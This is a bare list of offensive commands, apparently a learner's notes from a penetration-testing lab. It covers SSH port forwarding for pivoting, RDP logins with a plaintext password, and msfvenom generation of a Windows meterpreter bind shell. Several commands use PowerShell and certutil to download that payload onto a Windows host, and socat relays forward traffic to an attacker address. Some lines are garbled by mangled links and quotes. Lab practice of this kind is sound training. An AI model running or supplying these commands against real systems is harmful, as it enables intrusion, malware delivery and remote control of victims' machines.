ssh -L 3389:172.16.5.19:3389 ubuntu@10.129.202.64 it will open rdp port on window machine.

ssh -R 172.16.5.19:8080:0.0.0.0:8000 ubuntu@10.129.103.207 –vN reverse port forwarding

xfreerdp3 /u:victor /p:pass@123 v:/127.0.0.1 /cert:ignore

msfvenom -p windows/x64/meterpreter/bind\_tcp -f exe -o bindoo.exe LPORT=8443

ssh -R 172.16.5.19:8080:0.0.0.0:8000 ubuntu@10.129.103.207

Invoke-WebRequest -Uri "http://172.16.5.19:8081/bindoo.exe" -OutFile "C:\Users\victor\Desktop\ba.exe"

certutil -urlcache -f [http://10.129.103.207:8000/bindoo.exe nc.exe](http://10.129.103.207:8000/bindoo.exe%20nc.exe)

xfreerdp3 /v:127.0.0.1:3389 /u:victor /p:pass@123 +clipboard /cert:ignore

socat TCP4-LISTEN:8081,fork TCP4:172.16.5.19:8443

powershell -Command "Invoke-WebRequest -Uri [http://172.16.5.19:8000/bindoo.exe -OutFile bind.exe](http://172.16.5.19:8000/bindoo.exe%20-OutFile%20bind.exe)"

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://10.129.103.207:8081/bindoo.exe', 'bind.exe')"

socat TCP4-LISTEN:8082,fork TCP4:10.10.14.93:8000

ssh -R 172.16.5.19:8080:0.0.0.0:8000 ubuntu@10.129.202.64 –vN

Invoke-WebRequest -Uri "http://172.16.5.129:8000/bindoo.exe" -OutFile "C:\Users\victor\Desktop\backupscript.exe"

./socat\_static TCP4-LISTEN:8081,fork TCP4:172.16.5.35:8443

ssh -i noon\_rsa -L 8443:127.0.0.1:8081 webadmin@10.129.229.129

curl -k http://localhost:8443

Invoke-WebRequest “http://10.129.229.129:8001/aisha”-OutFile “ C:\ filename”